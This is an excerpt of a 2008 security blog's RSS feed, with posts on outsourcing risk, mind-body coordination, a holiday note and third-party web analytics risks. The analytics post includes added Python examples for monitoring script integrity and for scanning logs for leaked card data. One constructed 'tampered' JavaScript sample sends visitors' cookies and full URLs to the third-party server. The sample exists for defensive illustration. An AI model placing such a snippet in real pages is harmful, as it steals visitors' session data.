<p>Register &#8211; Operational Risk should at this stage work closely with the businesses to document all known system risks and also audit the current process in order to discover the unknown issues. Again, have the owners sign up.</p>
<p>Maintain Control of your Controls &#8211; Do not outsource your controls. In fact, you can&#8217;t; this is an illusion too. At the end of the day it is still part of the company no matter which way you dice and slice it. Therefore, keep the management of security internal. Note: you can outsource specialised skills, but make sure you segregate this task to a separate 3rd party, not the 3rd party you have already outsourced to.</p>
<p>Monitoring &#8211; Perform regular ongoing auditing, monitoring and remediation of issues. With the owners taking responsibility for the issues and a <em>Solid Governance Model</em> you greatly reduce the inherent risks.</p>
<p><strong>Closing Comments: </strong>I guess the key point to take away is accountability. If no one within the organisation takes ownership of the issues, even with the advantages of cost savings and possible process improvements, how long before one of these internal systemic issues results in significant impact to the company (e.g., brand damage)? Then not only do the savings go out the window, but in the worst case the organisation as well.</p>
]]></content:encoded>
			<wfw:commentRss>http://securitytechscience.com/blog/?feed=rss2&amp;p=44</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mind &#8211; Body Coordination</title>
		<link>http://securitytechscience.com/blog/?p=43</link>
		<comments>http://securitytechscience.com/blog/?p=43#comments</comments>
		<pubDate>Fri, 12 Dec 2008 19:50:05 +0000</pubDate>
		<dc:creator>Jordan Del-Grande</dc:creator>
				<category><![CDATA[Psychology]]></category>

		<guid isPermaLink="false">http://securitytechscience.com/blog/?p=43</guid>
		<description><![CDATA[Reviewing a number of blogs, articles, etc., I noticed that there are a number of people in the security field who move from being skeptical, and at times cross over into being just plain cynical. I have also seen a post on slashdot where someone asked, &#8220;Are IT Security professionals less happy as their job [...]]]></description>
			<content:encoded><![CDATA[<p>Reviewing a number of blogs, articles, etc., I noticed that there are a number of people in the security field who move from being skeptical, and at times cross over into being just plain cynical. I have also seen a post on slashdot where someone asked, &#8220;Are IT Security professionals less happy as their job teaches them to focus on the negative side of life?&#8221;. See http://ask.slashdot.org/askslashdot/08/08/24/1731228.shtml</p>
<p>This post is about addressing these issues, but could be expanded so as to be used for many more life situations, instead of IT Security. But of course, that choice is up to you&#8230;</p>
<p>In order to understand where the people above have gone off track, we need to have a clear(er) understanding of what a person is made up of (i.e., mind and body). I am of the understanding that the ancient and modern arts, sciences, religions, etc. address enough about the mind-body system to help people. The only constant is that some people get it; the above ones have not, and this is not a rarity. Not surprising considering the pluralistic society in which we live.</p>
<p>It&#8217;s not necessarily anybody&#8217;s fault &#8211; I don&#8217;t think we should see it in the light of right and wrong here &#8211; but just accept that we as humans are accountable for our own actions, and deciding between positive skepticism and negative cynicism is a choice, much like choosing to walk in the sun or walk in the shade. Other articles may discuss art, science experiments, religious beliefs, etc., but this article is about going straight to the source of the problem. You.</p>
<p>If you do not believe you are accountable for your own actions, or where you are in your life today, then you&#8217;re living in a delusional world. This post will mean nothing to you so you should probably just not bother reading beyond this point. If you agree you are accountable for your own actions, if you want to be alert and positive because you are aware the householder does not know at what hour the burglar will come then you should read on.</p>
<p>You may think that if it&#8217;s as easy as choosing to be positive instead of negative then you&#8217;ll just choose to be positive. People can say this and some just do it, but others end up going back to their old ways. Others who have been negative for a long period would most likely find it difficult to change their ways immediately and could employ a defense mechanism and say things like, &#8220;it&#8217;s got nothing to do with me&#8221;, or &#8220;that&#8217;s just stupid, I know what I am doing, case closed&#8221;. </p>
<p>Now is the point where I have to call out that the following is going to get a little deep. The difference, I hope is that I do not want to be esoteric, so no haiku or parable. This is what I perceive to be simple logical steps that got me to this point. I am not pushing any &#8220;new age&#8221; idea, religion, because as I have said previously, the answers have already been provided in different formats. I just want to make it plain to you and put it in simple terms what I believe is known by many names such as &#8220;mind-body coordination&#8221;, &#8220;mind-body alignment&#8221;, etc., but are most likely all the same thing. When you read the below you could categorise parts as buddhist meditation, zen, taoism or say no that&#8217;s ki, chi or qi fundamentals. Preferably if you are going to make any judgement then call it psychology.  </p>
<p>At this junction, I think it is best if I just get to the point and give you the answer (as best as I understand it to be). As they say, a picture is worth a thousand words&#8230;</p>
<p style="text-align: center;"><img class="aligncenter" style="vertical-align: middle;" src="http://securitytechscience.com/images/mind_force.png" alt="Mind Force" width="450" height="169" /></p>
<p>From the diagram, in short, <em>mind moves the body</em>. The mind (conscious/subconscious) directs intention, that guides your action, this leads to a bodily response that is interpreted by bodily senses, which the mind (conscious/subconscious) is aware of. </p>
<p>As an easy example, let&#8217;s grab the coffee cup on the table. The mind says &#8220;grab the cup on the table&#8221;, the intention is generated by mind force guiding the arm to &#8220;grab the cup on the table&#8221;. Note that this is all non-physical or spiritual to this point. The arm reaches out and grabs the cup. The eyes see the cup has been grabbed and the fingers feel the cup in the hand and they relay this to the nervous system. Note that this section is physical to this point. Awareness of what just occurred is back in the non-physical realm.</p>
<p>If only life were so easy? I guess to name a few problems that occur in our daily lives just to illustrate why life can be complicated is in order. See how many you do&#8230;</p>
<ol>
<li> Instead of the mind generating an intention, the mind generates images known as your imagination. Freud would have called this Cathartic Energy. It occurs when your id or instinctual mind drives the idea like punching someone who has just made you angry, but your morals tell you otherwise. The energy has already been generated so must pass somewhere. As the super ego has blocked the intent, you instead imagine giving the guy one of your best beatings (using a Freudian world view).</li>
<li>The mind generates an intention but it is not a clear intention. As such, the body is guided down a different path than what was initially intended. Have you ever said to someone you love, &#8220;look, I know what I did, but that wasn&#8217;t my intention?&#8221;.</li>
<li>The mind generates a clear intention but you have bodily problems/limitations where you cannot physically achieve the desired response. Most people who dabble in sports would understand and relate to this one. That is, cannot drive like Tiger Woods or dunk like Michael Jordan.</li>
<li>The mind generates a clear intention but there is nerve damage and the response is misinterpreted and/or not interpreted at all by the body.</li>
</ol>
<p>You may have noticed that each of the above points is a breakdown in the arrows within the diagram. From this point forward I will be focusing on point 2. If you can achieve point 2 then point 1 will eventually dissipate to occurring only rarely. Points 3 and 4 are physical issues that require either more training, acceptance of your genetic makeup or specialised medical assistance which I cannot help you with.</p>
<p>If you have made it this far, thank you. You are about to get to the interesting part so let&#8217;s begin with a question. If your mind has a desired intention, but after executing the action your awareness tells you something different from the original intention then which one is telling you the truth? Your Mind or your Awareness? Don&#8217;t cheat! Think about it&#8230;</p>
<p>For those who said Awareness, give yourselves a pat on the back. Not too much of a slap as you are only half right. The other half of the story is although awareness is more truthful than the mind, it is only a relative truth. To find the absolute truth is beyond the realm of this post as I am keeping the post only in the epistemological realm. </p>
<p>For those who said Mind, I am sorry to say that your ego is lying to you. It wasn&#8217;t the body&#8217;s fault as it is guided by your intention. It wasn&#8217;t your intention&#8217;s fault as it is generated by the mind. That&#8217;s right, that shadow lurking in the corner is your ego and she is a tricky little minx.</p>
<p>So what&#8217;s this got to do with &#8220;mind-body coordination&#8221; I hear you ask? Well, if you can align your mind, intention, body in order to achieve the desired action (as interpreted by your awareness), then you have achieved mind-body coordination/alignment. I do prefer this type of terminology as no-mind appears to me as a misnomer and/or misleading &#8211; It would be better to say &#8216;little idea&#8217; with everything else empty (i.e., non cluttered mind).</p>
<p>So how would someone apply this in their daily life so as to remain positive (healthy skepticism) instead of negative (self centered cynicism)? My advice is to keep it simple. Ask yourself regularly, how am I feeling right now at this point in time. If you feel good and relaxed you&#8217;re on the right track. If not, it&#8217;s your mind that&#8217;s off track, so try again. Remember to keep saying to yourself there is always a better way. And when making decisions, don&#8217;t use your head, remember to ask yourself what does your gut tell you. Make sure to act on it and stop day dreaming. </p>
<p>If you would like to take this further or improve honing your skill set, my suggestion is that you get yourself involved in something you enjoy doing and practice the above. I personally use the above in my martial arts training as I am involved in an intentional martial arts (i.e., internal/soft). I have found that on this path of discovery (which is still going), these things I learn in class spill out to my daily life. They make me a better person and hopefully it can do the same for you. Maybe you can discover like me how mind-body coordination just naturally results in selfless altruistic behaviour. Of course, as I am at a junior level, my ego trips me up every now and then more than I would like, but at least now I have the right tools to get back on the right path.  </p>
<p>Now, referring back to the SlashDot article listed above. Here is where the author is off track&#8230;</p>
<p>&#8220;(His job) constantly teaches him to focus on the negative side of life&#8221; &#8211; No, being negative or positive is a choice. By placing the fact you have chosen to be negative on your job (even if 99.9% of the population may do it) is a cop out. It is the mind projecting its negative intent onto an object. The object in this case being your job.</p>
<p>&#8220;As an auditor I search for errors that others have made and haughtily tell them&#8221; &#8211; Being haughty is a form of pride. Need I remind anyone of the seven deadly sins? Again, if you are choosing to be selfish instead of selfless, this is, at its basic layer, choosing to be negative instead of positive.</p>
<p>&#8220;As a penetration tester I break systems that system engineers and administrators have laboriously built&#8221; &#8211; If the system admin was that laborious then I guess you wouldn&#8217;t really have broken in without some social engineering tactics. If you did, why would you be negative about this? You possibly found a new 0-day and could earn some extra money or help vendors code better systems by reporting it.</p>
<p>&#8220;I assume inside threats and have to be professionally suspicious.&#8221; &#8211; Really? Where is it written that we have to be professionally suspicious? If it&#8217;s on a security card somewhere, cool, where can I order one? I would say that it would be better to be cautious rather than distrustful. Wouldn&#8217;t you agree that as a security professional it is better to be on your guard?</p>
<p>&#8220;The <a href="http://www.wired.com/politics/security/commentary/securitymatters/2008/03/securitymatters_0320">security mindset </a>surely helps me in my job&#8221; &#8211; Agree, me too.</p>
<p>&#8220;but is it good for me on the long run?&#8221; &#8211; In a 100 years when you are dead and buried what is it going to matter? Stop being so precious about yourself.</p>
<p>&#8220;What kind of influence has being an IT security professional had on your general attitude towards life?&#8221; &#8211; Me personally, I am stronger for it. You, I am not so sure about.</p>
<p>&#8220;What helps you stay out of pessimism and cynicism?&#8221; &#8211; Making the conscious choice of choosing to think and do positive things. Stop blaming everything else around you and begin by asking yourself what you may be doing wrong.</p>
<p>&#8220;Is protecting existing things really as good as building new ones?&#8221; &#8211; It all depends on what you are protecting and also what you are building.</p>
<p>&#8220;I always have to think about risks and identify all sorts of things that could go wrong.&#8221; &#8211; That&#8217;s your job. There is no reason to be negative about it as it&#8217;s actually a pretty cool thing to get paid for.</p>
<p>I apologise in advance to the author of the Slashdot article if he takes offense to what I have written. But honestly, the truth hurts (when you are in the wrong), but you were the one who asked for a response. My advice is that if you are suffering in your current situation then you are thinking the wrong way. Changing your employer or your vocation won&#8217;t help you as this will not solve the core of the problem. You asked for help and if you understand what I am talking about in this post then the smartest thing you can do is laugh it off.</p>
<p>Note: Any &#8220;positive&#8221; comments on the above would be much appreciated as there could possibly be more arrows or more boxes in the above diagram, something that is incorrect, or requires further clarification&#8230;</p>
<p>Note: In the second paragraph, the person could be made up of more than mind-body, such as heart, soul, spirit, etc., but that is outside the scope of the above topic. Please keep all comments within the epistemological realm. </p>
]]></content:encoded>
			<wfw:commentRss>http://securitytechscience.com/blog/?feed=rss2&amp;p=43</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Bula!</title>
		<link>http://securitytechscience.com/blog/?p=42</link>
		<comments>http://securitytechscience.com/blog/?p=42#comments</comments>
		<pubDate>Sun, 10 Aug 2008 20:53:12 +0000</pubDate>
		<dc:creator>Jordan Del-Grande</dc:creator>
				<category><![CDATA[Conferences]]></category>

		<guid isPermaLink="false">http://securitytechscience.com/blog/?p=42</guid>
		<description><![CDATA[
Bula Everyone,
For those who have never been, I do highly recommend a trip to Fiji. I just came back from a week on Tokoriki Island off the coast of Nadi. I am highly refreshed and am ready to jump back into work and be more proactive with my security blogs&#8230;
Also, a very warm hello goes [...]]]></description>
			<content:encoded><![CDATA[<div>
<p>Bula Everyone,</p>
<p>For those who have never been, I do highly recommend a trip to Fiji. I just came back from a week on Tokoriki Island off the coast of Nadi. I am highly refreshed and am ready to jump back into work and be more proactive with my security blogs&#8230;</p>
<p>Also, a very warm hello goes out to most of my friends at black hat. Thanks for the wake up call whilst you were all partying in Vegas but I only received the voice message when I got back (Golden Rule in Fiji: No Technology Allowed). </p>
<p>Finally, I did receive some comments regarding the STS Scanner and why it lacked a number of plugins that I could easily write up. It&#8217;s true, I could easily write them up and I have with some other much more useful features, but I use this version for company use only. The online version is really just a baseline to teach people more about the ideas and frameworks that can be used to build a web application security scanner. It is not meant to be exhaustive with features and add-ons, as that may confuse the point of the tutorial and would most likely only be used by script kiddies. Of course, anyone who understands what I have coded can easily add more features on as that was the point of why I purposely made the tool extensible.</p>
<p>Vinaka</p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://securitytechscience.com/blog/?feed=rss2&amp;p=42</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Web Analytic Tools</title>
		<link>http://securitytechscience.com/blog/?p=40</link>
		<comments>http://securitytechscience.com/blog/?p=40#comments</comments>
		<pubDate>Thu, 26 Jun 2008 03:45:41 +0000</pubDate>
		<dc:creator>Jordan Del-Grande</dc:creator>
				<category><![CDATA[Web A&P]]></category>

		<guid isPermaLink="false">http://securitytechscience.com/blog/?p=40</guid>
		<description><![CDATA[I recently had a client inquire about some of the potential risks associated with using a 3rd party web analytics tool.
Businesses normally want to use these tools to report on the behavior of users who visit their site in order to improve customer experience and measure sales performance. All that is required is for the [...]]]></description>
			<content:encoded><![CDATA[<p>I recently had a client inquire about some of the potential risks associated with using a 3rd party web analytics tool.</p>
<p>Businesses normally want to use these tools to report on the behavior of users who visit their site in order to improve customer experience and measure sales performance. All that is required is for the business to include an innocuous JavaScript tag (provided by the 3rd party) in each page they would like to measure. If the user&#8217;s browser allows JavaScript to run, the tag runs on every page view and loads a larger script from the 3rd party&#8217;s server.</p>
<p>For example, let&#8217;s say I provided a web analytics service and you used me as a 3rd party. I would provide you with the below script and then you would place the following tag on every page of your website&#8230;</p>
<p>&lt;script src="http://www.securitytechscience.com/sts.js" type="text/javascript"&gt;&lt;/script&gt;</p>
<p>The sts.js script on my server would then run in the user&#8217;s browser every time a user visited your site . I would then provide you a log-in page that generates pretty reports for you to see how your user base is behaving.</p>
<p>Sounds great doesn&#8217;t it? Now for the risks&#8230;</p>
<p>NB: The risks below apply to companies that host more than just brochureware; a static marketing site with no customer data has far less at stake.</p>
<h3>Integrity of the script &#8211; Maybe the script is OK today but what about tomorrow?</h3>
<p><em>How could you be assured that the 3rd party wouldn&#8217;t change it? What if the 3rd party server was hacked and replaced with malicious code by someone else? If a change were to occur how long before you would notice? If you did notice then what?</em></p>
<p>The above questions really hit home to three of the core functions of information security within any organisation&#8230;</p>
<ol>
<li>Change control: If the 3rd party wanted to change the script then they should notify you and this would be input to your change control process.</li>
<li>Audit &amp; Monitoring: The 3rd party should provide this, but you could just as easily write a script that downloads the live script every hour and compares it (or its hash) with your known good copy, alerting when they differ. Fetch it the way a browser would and from the same network your users are on, as a 3rd party can serve different content to different clients.</li>
<li>Incident Response: If the script were to change without prior change control notification then there should be an incident response plan to follow.</li>
</ol>
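<p>As an added example (not code from the original post), the following Python is the kind of monitor item 2 describes: it fetches the live script, compares its SHA-256 with the hash of the copy that went through change control, and on a mismatch returns a unified diff for the incident responder. The tag URL is the post&#8217;s own example; the &#8220;known good&#8221; and &#8220;tampered&#8221; script bodies are constructed, and the fetch function is injected so the check runs offline here (pass fetch_live from cron in production).</p>

```python
"""Hourly integrity check for a 3rd-party analytics tag.

Added example, not code from the original post. Assumptions:
  * the tag URL is the post's own example, http://www.securitytechscience.com/sts.js;
  * the "known good" copy is the version that went through change control,
    and its SHA-256 is what the monitor pins;
  * `fetch` is injected so the check runs offline here; in production pass
    `fetch_live`, which uses urllib.
"""
import difflib
import hashlib
import urllib.request
from typing import Callable

SCRIPT_URL = "http://www.securitytechscience.com/sts.js"

# Constructed sample: the script as reviewed and approved.
KNOWN_GOOD = b"""var sts = function () {
  var i = new Image();
  i.src = 'https://www.securitytechscience.com/c.gif?p=' + encodeURIComponent(location.pathname);
};
sts();
"""
KNOWN_GOOD_SHA256 = hashlib.sha256(KNOWN_GOOD).hexdigest()

# Constructed sample: a silently changed version that now ships the full URL
# (query string included) and the document's cookies to the 3rd party.
TAMPERED = b"""var sts = function () {
  var i = new Image();
  i.src = 'https://www.securitytechscience.com/c.gif?p=' + encodeURIComponent(location.href)
        + '&c=' + encodeURIComponent(document.cookie);
};
sts();
"""


def fetch_live(url: str) -> bytes:
    """Download the script as a browser would, bypassing any caching layer."""
    req = urllib.request.Request(url, headers={"Cache-Control": "no-cache"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


def check_script(fetch: Callable[[str], bytes],
                 url: str = SCRIPT_URL,
                 expected_sha256: str = KNOWN_GOOD_SHA256,
                 known_good: bytes = KNOWN_GOOD) -> dict:
    """Compare the live script with the pinned hash.

    Returns a dict with "status" of "ok" or "changed". On a change the
    unified diff against the approved copy is included, so the responder can
    see what moved without re-fetching (the 3rd party may change it again).
    """
    body = fetch(url)
    actual = hashlib.sha256(body).hexdigest()
    if actual == expected_sha256:
        return {"status": "ok", "sha256": actual, "diff": []}
    diff = list(difflib.unified_diff(
        known_good.decode("utf-8", "replace").splitlines(),
        body.decode("utf-8", "replace").splitlines(),
        fromfile="known_good", tofile="live", lineterm=""))
    return {"status": "changed", "sha256": actual, "diff": diff}


if __name__ == "__main__":
    # Offline demonstration with the constructed samples; cron would call
    # check_script(fetch_live) hourly and raise an incident on "changed".
    for label, body in (("approved copy", KNOWN_GOOD), ("tampered copy", TAMPERED)):
        result = check_script(lambda _url, b=body: b)
        print(f"{label}: {result['status']} sha256={result['sha256'][:16]}...")
        for line in result["diff"]:
            print("   ", line)
```

<p>Treat &#8220;changed&#8221; as a change-control event rather than an automatic page-out: a legitimate update still has to be reviewed, and it becomes an incident when the diff alters what the script collects, as the tampered sample does by adding the full URL and the cookies. Run the fetch from the same network your users are on, since a 3rd party can serve different content to different clients.</p>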
<h3>Integrity of the 3rd Party</h3>
<p><em>How could you be sure that the 3rd party uses a level of security practices that are aligned with your organisation? How could you be sure that if things did go wrong you were covered?</em></p>
<p>The above questions are concerned with a breadth of business units such as operational risk &amp; compliance, legal as well as information security. They would include questions such as&#8230;</p>
<ol>
<li>Is there a contract between the third party and the organisation?</li>
<li>Does the contract include x, y, z to cover the organisaion in the event of a, b, c?</li>
<li>Does the contract include a SAS70 or equivalent?</li>
<li>Does the contract include a monetary figure (i.e., a liability cap)?</li>
<li>Has privacy been considered?</li>
</ol>
<p>In most (if not all) 3rd party contracts, the above questions favour the 3rd party and not you.</p>
<h3>Confidentiality of the Data</h3>
<p><em>How can you be certain that any confidential data remains secure? How is the data (both confidential and non-confidential) transferred?</em></p>
<p>Although your site may be using SSL (i.e., https), the 3rd party may not, and the script and the data it sends back may be transferred via http. If this is the case, then any sensitive data passed is transferred across the Internet in the clear.</p>
<p>Even if you are using SSL and the 3rd party is using SSL (i.e., https) as well, what if the JavaScript sends data as parameters of an http GET request? SSL encrypts the URI and its parameters on the wire, so a network eavesdropper does not see them, but the full URI is still written to the 3rd party&#8217;s web server logs, to the logs of any proxy or load balancer in between, and to the browser cache, where anyone who can read those can see it. For example,</p>
<p>GET https://www.example.com/cc_valid.js?credit_no=123412341234&amp;date=31122008&amp;ccv=123</p>
<p>And finally, do you really want an external script running anywhere near your customer&#8217;s sensitive information?</p>
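<p>As an added example (not from the original post), the following Python scans a log of outbound requests for exactly the leak shown above: Luhn-valid card numbers, or sensitive parameter names, in the query string of a request to a 3rd party. The log lines are constructed in the shape TIMESTAMP METHOD URL, as a forward proxy would record them; 4111111111111111 is a well-known test card number. Whether the request went over http or https is reported with each finding, since the former leaks on the wire and the latter still leaks into logs like this one.</p>

```python
"""Scan outbound analytics requests for sensitive data in the query string.

Added example, not code from the original post. It assumes the requests are
available as log lines of the form TIMESTAMP METHOD URL (the shape a forward
proxy or the 3rd party's own access log would give you; constructed here),
and that "sensitive" means a Luhn-valid card number or a parameter whose
name suggests card, password or identity data.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log; 4111111111111111 is a well-known test card number.
SAMPLE_LOG = """\
2008-06-26T03:45:41Z GET https://www.securitytechscience.com/c.gif?p=%2Fcheckout
2008-06-26T03:45:42Z GET https://www.example.com/cc_valid.js?credit_no=4111111111111111&date=31122008&ccv=123
2008-06-26T03:45:43Z GET http://www.securitytechscience.com/c.gif?p=%2Fthanks&order=A1B2
"""

# Parameter names that should never reach a 3rd party, whatever the value.
SENSITIVE_NAME = re.compile(r"^(cc|ccv|cvv|cvc|pan|ssn)$|card|credit|pass|pwd", re.I)


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit test used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def looks_like_card(value: str) -> bool:
    """13-19 digits (spaces/dashes ignored) that pass Luhn."""
    digits = re.sub(r"[ -]", "", value)
    return digits.isdigit() and 13 <= len(digits) <= 19 and luhn_ok(digits)


def flag_request(url: str) -> list:
    """Return (parameter, reason) pairs for anything sensitive in the query string."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if looks_like_card(value):
            findings.append((name, "luhn-valid card number"))
        elif SENSITIVE_NAME.search(name):
            findings.append((name, "sensitive parameter name"))
    return findings


def scan_log(text: str) -> list:
    """One record per offending request; the scheme is kept so http vs https can be reported."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, _method, url = line.split(" ", 2)
        findings = flag_request(url)
        if findings:
            hits.append({"url": url, "scheme": urlsplit(url).scheme, "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        wire = "in the clear on the wire" if hit["scheme"] == "http" else "encrypted in transit, but logged"
        print(hit["url"])
        for name, reason in hit["findings"]:
            print(f"   {name}: {reason} ({wire})")
```

<p>The same scan run over the 3rd party&#8217;s own access log (if they will give you one) or over a proxy log on your side answers the question in the heading directly: if the card number is in the log, it has already left your control, SSL or not.</p>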
<h3>Problem</h3>
<p>As you can see, the above solution adds considerable overhead if you want to implement it securely in order to protect your customers&#8217; data and your company&#8217;s reputation. As a business, the benefits that were promised at the beginning of the sales pitch may not be sounding so great anymore, and you may be leaning toward building a solution in-house. Although that is a secure solution, you soon find out it comes at a much higher cost. So is there an alternative?</p>
<h3>Solution</h3>
<p>I would recommend copying the 3rd party script onto a local organisational server so that control of the script is now with you. The 3rd party is then forced to contact you when they would like to update it, which brings each update back under your change control process (you still need to review it before you publish it). You could go even further and ask that the reporting functionality is housed on your network. That is, you provide the box and they provide the application. If they won&#8217;t allow you to house the application you could always set up a B2B channel with the 3rd party for the cases where sensitive data may be transferred &#8211; this channel could be over a dedicated link or a VPN using an IPsec tunnel.</p>
]]></content:encoded>
			<wfw:commentRss>http://securitytechscience.com/blog/?feed=rss2&amp;p=40</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
